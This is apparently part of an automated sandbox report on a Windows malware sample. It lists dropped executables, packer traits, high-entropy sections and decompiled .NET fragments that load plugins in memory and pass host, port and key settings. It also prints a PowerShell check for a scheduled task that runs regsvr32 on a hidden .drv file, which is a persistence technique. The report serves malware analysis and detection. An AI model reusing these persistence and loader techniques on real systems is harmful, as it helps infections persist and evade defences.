Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: explorerframe.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: sfc.dll
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: apphelp.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: aclayers.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: mpr.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: sfc_os.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\regsvr32.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\regsvr32.exe	Section loaded: apphelp.dll

Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32

Jump to behavior

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\tasklist.exe tasklist

Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp

Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwner

Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp

Window found: window name: TMainForm

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Windows\System32\regsvr32.exe

File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll

Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp

Registry value created: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Ratty Jellyfish_is1

Source: DbCMTMgeJo.exe

Static file information: File size 1875456 > 1048576

Source: DbCMTMgeJo.exe

Static PE information: Raw size of oetrsojv is bigger than: 0x100000 < 0x19d200

Source:	Binary string: Chicken.pdb source: c153ad0ce0.exe, 00000008.00000002.2984332143.0000000004179000.00000004.00000800.00020000.00000000.sdmp, c153ad0ce0.exe, 00000008.00000000.2747691872.0000000000D52000.00000002.00000001.01000000.0000000C.sdmp
Source:	Binary string: c:\zlib-dll\Release\isunzlib.pdb source: 21aaa725bd.tmp, 0000001E.00000003.2926150194.0000000003508000.00000004.00001000.00020000.00000000.sdmp, 21aaa725bd.tmp, 0000001E.00000003.2923189611.00000000031D0000.00000004.00001000.00020000.00000000.sdmp

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Unpacked PE file: 3.2.UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.d20000.0.unpack :EW;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;bzipjhra:EW;iworeitq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Unpacked PE file: 4.2.EUONBTH0X1WAZ900JF4PYRKDM.exe.120000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 5.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.fb0000.0.unpack :EW;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W;fwrotwuw:EW;wyiambmx:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Unpacked PE file: 28.2.1639401074.exe.f0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;jxlmjtji:EW;pjewfnhk:EW;.taggant:EW;

.NET source code contains method to dynamically call methods (often used by packers)

Source: random[1].exe.7.dr, MDBp674GwRHUPSSZoY.cs	.Net Code: b4c1QlVMHpWrewVtQ3f(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: c153ad0ce0.exe.7.dr, MDBp674GwRHUPSSZoY.cs	.Net Code: b4c1QlVMHpWrewVtQ3f(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, MDBp674GwRHUPSSZoY.cs	.Net Code: b4c1QlVMHpWrewVtQ3f(typeof(Marshal).TypeHandle).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Messages.cs	.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)

.NET source code contains potential unpacker

Source: random[1].exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	.Net Code: IubHDIcZeH
Source: random[1].exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	.Net Code: COicAHkiBk
Source: c153ad0ce0.exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	.Net Code: IubHDIcZeH
Source: c153ad0ce0.exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	.Net Code: COicAHkiBk
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, tj1xbHsoeaoHs6qpe60.cs	.Net Code: IubHDIcZeH
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, tj1xbHsoeaoHs6qpe60.cs	.Net Code: COicAHkiBk
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 34.2.regsvr32.exe.2310000.2.raw.unpack, Messages.cs	.Net Code: Memory
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Messages.cs	.Net Code: Plugin System.AppDomain.Load(byte[])
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Messages.cs	.Net Code: Memory System.AppDomain.Load(byte[])
Source: 34.2.regsvr32.exe.211131e.1.raw.unpack, Messages.cs	.Net Code: Memory

Suspicious powershell command line found

Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"
Source: C:\Windows\System32\regsvr32.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell" -Command "if (Get-ScheduledTask \| Where-Object { $_.Actions.Execute -eq 'regsvr32' -and $_.Actions.Arguments -eq '/S /i:SYNC C:\Users\user\AppData\Roaming\uxtheme_2.drv' }) { exit 0 } else { exit 1 }"

Source: 5ec73896e9.exe.7.dr

Static PE information: 0xB9EE827D [Tue Nov 6 08:25:33 2068 UTC]

Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline"
Source: C:\Users\user\AppData\Local\Temp\1062146001\5ec73896e9.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\gaqlxgdr\gaqlxgdr.cmdline"

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: random[2].exe0.7.dr	Static PE information: real checksum: 0x0 should be: 0x3a0195
Source: random[1].exe1.7.dr	Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
Source: 8ec89b23d4.exe.7.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
Source: is-1MO68.tmp.32.dr	Static PE information: real checksum: 0x319701 should be: 0x30ff91
Source: _setup64.tmp.30.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: 63460ff8c7.exe.7.dr	Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
Source: _setup64.tmp.32.dr	Static PE information: real checksum: 0x0 should be: 0x8546
Source: 21aaa725bd.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: skotes.exe.4.dr	Static PE information: real checksum: 0x2e8a3c should be: 0x2f1b0b
Source: DbCMTMgeJo.exe	Static PE information: real checksum: 0x1ca9a4 should be: 0x1d51ee
Source: 1639401074.exe.7.dr	Static PE information: real checksum: 0x1da53e should be: 0x1d2bf2
Source: _isdecmp.dll.30.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: _isdecmp.dll.32.dr	Static PE information: real checksum: 0x0 should be: 0x5528
Source: c153ad0ce0.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x895f3
Source: 21aaa725bd.tmp.29.dr	Static PE information: real checksum: 0x0 should be: 0x122532
Source: random[2].exe.7.dr	Static PE information: real checksum: 0xdfde2 should be: 0xd54e7
Source: is-TG5QS.tmp.32.dr	Static PE information: real checksum: 0x0 should be: 0x1308eb
Source: random[1].exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x895f3
Source: random[1].exe2.7.dr	Static PE information: real checksum: 0x0 should be: 0x16fc42
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: real checksum: 0x1bc4aa should be: 0x1c46c8
Source: 21aaa725bd.tmp.31.dr	Static PE information: real checksum: 0x0 should be: 0x122532
Source: random[1].exe0.7.dr	Static PE information: real checksum: 0xfd7f5 should be: 0xfdb14
Source: db8c172567.exe.7.dr	Static PE information: real checksum: 0x0 should be: 0x3a0195

Source: DbCMTMgeJo.exe	Static PE information: section name:
Source: DbCMTMgeJo.exe	Static PE information: section name: .idata
Source: DbCMTMgeJo.exe	Static PE information: section name:
Source: DbCMTMgeJo.exe	Static PE information: section name: oetrsojv
Source: DbCMTMgeJo.exe	Static PE information: section name: ctrebqrr
Source: DbCMTMgeJo.exe	Static PE information: section name: .taggant
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name:
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: .idata
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name:
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: bzipjhra
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: iworeitq
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: .taggant
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name:
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: .idata
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: fwrotwuw
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: wyiambmx
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: .taggant
Source: skotes.exe.4.dr	Static PE information: section name:
Source: skotes.exe.4.dr	Static PE information: section name: .idata
Source: skotes.exe.4.dr	Static PE information: section name: fwrotwuw
Source: skotes.exe.4.dr	Static PE information: section name: wyiambmx
Source: skotes.exe.4.dr	Static PE information: section name: .taggant
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: .idata
Source: random[1].exe1.7.dr	Static PE information: section name:
Source: random[1].exe1.7.dr	Static PE information: section name: jxlmjtji
Source: random[1].exe1.7.dr	Static PE information: section name: pjewfnhk
Source: random[1].exe1.7.dr	Static PE information: section name: .taggant
Source: 1639401074.exe.7.dr	Static PE information: section name:
Source: 1639401074.exe.7.dr	Static PE information: section name: .idata
Source: 1639401074.exe.7.dr	Static PE information: section name:
Source: 1639401074.exe.7.dr	Static PE information: section name: jxlmjtji
Source: 1639401074.exe.7.dr	Static PE information: section name: pjewfnhk
Source: 1639401074.exe.7.dr	Static PE information: section name: .taggant
Source: is-1MO68.tmp.32.dr	Static PE information: section name: .xdata
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /4
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /19
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /35
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /47
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /61
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /73
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /86
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /97
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /113
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /127
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /143
Source: is-1MO68.tmp.32.dr	Static PE information: section name: /159
Source: dllhost.exe.34.dr	Static PE information: section name: .didat

Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Code function: 0_3_0175EEA0 push eax; retf	0_3_0175EF85
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Code function: 0_3_0175EEA0 push eax; retf	0_3_0175EF85
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Code function: 0_3_0175EEA0 push eax; retf	0_3_0175EF85
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Code function: 0_3_0175EEA0 push eax; retf	0_3_0175EF85
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	Code function: 0_3_0175EEA0 push eax; retf	0_3_0175EF85
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_0013D91C push ecx; ret	4_2_0013D92F
Source: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Code function: 4_2_00131359 push es; ret	4_2_0013135A
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 5_2_00FCD91C push ecx; ret	5_2_00FCD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_01000007 push es; ret	7_2_0100001E
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0100001F push es; ret	7_2_01000022
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_0100023C push es; retn 0004h	7_2_01000242
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FCD91C push ecx; ret	7_2_00FCD92F
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FCDFC6 push ecx; ret	7_2_00FCDFD9

Source: DbCMTMgeJo.exe	Static PE information: section name: entropy: 7.976720656984143
Source: DbCMTMgeJo.exe	Static PE information: section name: oetrsojv entropy: 7.954165259252759
Source: UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe.0.dr	Static PE information: section name: bzipjhra entropy: 7.95452541615898
Source: EUONBTH0X1WAZ900JF4PYRKDM.exe.0.dr	Static PE information: section name: entropy: 7.981797773656524
Source: skotes.exe.4.dr	Static PE information: section name: entropy: 7.981797773656524
Source: random[1].exe1.7.dr	Static PE information: section name: entropy: 7.976929850931208
Source: random[1].exe1.7.dr	Static PE information: section name: jxlmjtji entropy: 7.953783368763905
Source: 1639401074.exe.7.dr	Static PE information: section name: entropy: 7.976929850931208
Source: 1639401074.exe.7.dr	Static PE information: section name: jxlmjtji entropy: 7.953783368763905

Source: 5ec73896e9.exe.7.dr, aNQaxxDiYjXg.cs	High entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
Source: 5ec73896e9.exe.7.dr, uBQRQemRwragayxWIgNspKbnCcaXv.cs	High entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
Source: random[1].exe.7.dr, xbIeqLsGZcu6UPoBJ7o.cs	High entropy of concatenated method names: 'LsCsWi6Z6s', 'H3as5R5UXQ', 'ApYsx9RaYW', 'kOysaaYxMp', 'eIlsSJYfRT', 'J6usBk7H3X', 'Uyos30t850', 'KYXsNmnMxt', 'gBqsuutXQT', 'ruRsmrvum0'
Source: random[1].exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	High entropy of concatenated method names: 'aQkRupn0Ci', 'TSdRmZwiJJ', 'lGaRoRh5kU', 'kCoRwL4W4q', 'wABR65rmjn', 'LBhRZt22fQ', 'HNWRP2TWOS', 'XeYXXu2BuP', 'UOaRkx77RZ', 'u65RIb9p02'
Source: random[1].exe.7.dr, Program.cs	High entropy of concatenated method names: 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'GetProfileInfo', 'Main', 'atORZJjWTG7pNwwg7aE', 'Hux2Afj5HvN18mMPhcR', 'EWZdlFjJ2Xps6bMDHOv', 'y9iarbjAoHx7utRXU5N', 'yxgQgbjxwrtQhF56rXT'
Source: random[1].exe.7.dr, MDBp674GwRHUPSSZoY.cs	High entropy of concatenated method names: 'TZQTtIVxpoDZaexsxBh', 'w2jChbVas8Uag2lUCaw', 'LFQgbLvjQd', 'IOZ9E2VNWqKFPasH4VF', 'FQjKtiVuImsKhfT5Ypi', 'RqrasOVmOZd4eQiMHtN', 'hcqRDDVojLsJJfmWiBf', 'nW4lBacjpc', 'XE0sfjo3nK', 'mX5sgrUkMs'
Source: c153ad0ce0.exe.7.dr, xbIeqLsGZcu6UPoBJ7o.cs	High entropy of concatenated method names: 'LsCsWi6Z6s', 'H3as5R5UXQ', 'ApYsx9RaYW', 'kOysaaYxMp', 'eIlsSJYfRT', 'J6usBk7H3X', 'Uyos30t850', 'KYXsNmnMxt', 'gBqsuutXQT', 'ruRsmrvum0'
Source: c153ad0ce0.exe.7.dr, tj1xbHsoeaoHs6qpe60.cs	High entropy of concatenated method names: 'aQkRupn0Ci', 'TSdRmZwiJJ', 'lGaRoRh5kU', 'kCoRwL4W4q', 'wABR65rmjn', 'LBhRZt22fQ', 'HNWRP2TWOS', 'XeYXXu2BuP', 'UOaRkx77RZ', 'u65RIb9p02'
Source: c153ad0ce0.exe.7.dr, Program.cs	High entropy of concatenated method names: 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'GetProfileInfo', 'Main', 'atORZJjWTG7pNwwg7aE', 'Hux2Afj5HvN18mMPhcR', 'EWZdlFjJ2Xps6bMDHOv', 'y9iarbjAoHx7utRXU5N', 'yxgQgbjxwrtQhF56rXT'
Source: c153ad0ce0.exe.7.dr, MDBp674GwRHUPSSZoY.cs	High entropy of concatenated method names: 'TZQTtIVxpoDZaexsxBh', 'w2jChbVas8Uag2lUCaw', 'LFQgbLvjQd', 'IOZ9E2VNWqKFPasH4VF', 'FQjKtiVuImsKhfT5Ypi', 'RqrasOVmOZd4eQiMHtN', 'hcqRDDVojLsJJfmWiBf', 'nW4lBacjpc', 'XE0sfjo3nK', 'mX5sgrUkMs'
Source: random[2].exe1.7.dr, aNQaxxDiYjXg.cs	High entropy of concatenated method names: 'MsYIiHCKOVg', 'AEIcapmlYwreYrwbho', 'grtEQPnEWQeGyOSsVquAnysLp', 'pxnOSxlzAtLoJePZLWYzXO', 'IbsfQgxrfqgPuy', 'ztQvAnOyfhhCblhxUz', 'dxdlOMPOTTnPkakgWUGEGfztEkAq', 'OAifdjgfkNwmDDXqVnAD', 'TLJetgkhOgLr', 'drEVxryILBScHeTHJfUUrx'
Source: random[2].exe1.7.dr, uBQRQemRwragayxWIgNspKbnCcaXv.cs	High entropy of concatenated method names: 'IjUmeHhCBOyXrjvVvfONTPF', 'jPPhvaEdyPCFnNAkJlNs', 'BeQPfkZSpjPvYqqBenLtJZo', 'CYawTJzZuySnyVztOHTAHtpzd', 'JjaSPmSzbwZLvheEztVywB', 'AQYdCEVeAxZE', 'ahfneZThAlkikgxqxo', 'YMclrJgYWZTZSKJJSQaYw', 'vJnhTmqycRrvnmNN', 'bxqWmohFigqxoF'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, xbIeqLsGZcu6UPoBJ7o.cs	High entropy of concatenated method names: 'LsCsWi6Z6s', 'H3as5R5UXQ', 'ApYsx9RaYW', 'kOysaaYxMp', 'eIlsSJYfRT', 'J6usBk7H3X', 'Uyos30t850', 'KYXsNmnMxt', 'gBqsuutXQT', 'ruRsmrvum0'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, tj1xbHsoeaoHs6qpe60.cs	High entropy of concatenated method names: 'aQkRupn0Ci', 'TSdRmZwiJJ', 'lGaRoRh5kU', 'kCoRwL4W4q', 'wABR65rmjn', 'LBhRZt22fQ', 'HNWRP2TWOS', 'XeYXXu2BuP', 'UOaRkx77RZ', 'u65RIb9p02'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, Program.cs	High entropy of concatenated method names: 'VirtualProtect', 'CallWindowProcA', 'ParseTree', 'GetProfileInfo', 'Main', 'atORZJjWTG7pNwwg7aE', 'Hux2Afj5HvN18mMPhcR', 'EWZdlFjJ2Xps6bMDHOv', 'y9iarbjAoHx7utRXU5N', 'yxgQgbjxwrtQhF56rXT'
Source: 8.2.c153ad0ce0.exe.4179550.0.raw.unpack, MDBp674GwRHUPSSZoY.cs	High entropy of concatenated method names: 'TZQTtIVxpoDZaexsxBh', 'w2jChbVas8Uag2lUCaw', 'LFQgbLvjQd', 'IOZ9E2VNWqKFPasH4VF', 'FQjKtiVuImsKhfT5Ypi', 'RqrasOVmOZd4eQiMHtN', 'hcqRDDVojLsJJfmWiBf', 'nW4lBacjpc', 'XE0sfjo3nK', 'mX5sgrUkMs'

Persistence and Installation Behavior

Drops PE files with a suspicious file extension

Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com			Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\36469\Avoiding.com			Jump to dropped file

Source: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-9LOBR.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_shfoldr.dll	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062143001\1639401074.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062141001\c153ad0ce0.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062142001\63460ff8c7.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PMW3U6MX\random[2].exe	Jump to dropped file
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File created: C:\Users\user\AppData\Local\Temp\EUONBTH0X1WAZ900JF4PYRKDM.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Roaming\is-1MO68.tmp	Jump to dropped file
Source: C:\Windows\SysWOW64\cmd.exe	File created: C:\Users\user\AppData\Local\Temp\764661\Macromedia.com	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Temp\1062145001\8ec89b23d4.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-3HIKL.tmp\21aaa725bd.tmp	File created: C:\Users\user\AppData\Local\Temp\is-S1J4E.tmp\_isetup\_setup64.tmp	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\1062144001\21aaa725bd.exe	File created: C:\Users\user\AppData\Local\Temp\is-GRC2D.tmp\21aaa725bd.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\DbCMTMgeJo.exe	File created: C:\Users\user\AppData\Local\Temp\UYYHR2FFXPC7QWGDTJ69V7UUE7H8M00.exe	Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\9C680Q69\random[2].exe	Jump to dropped file
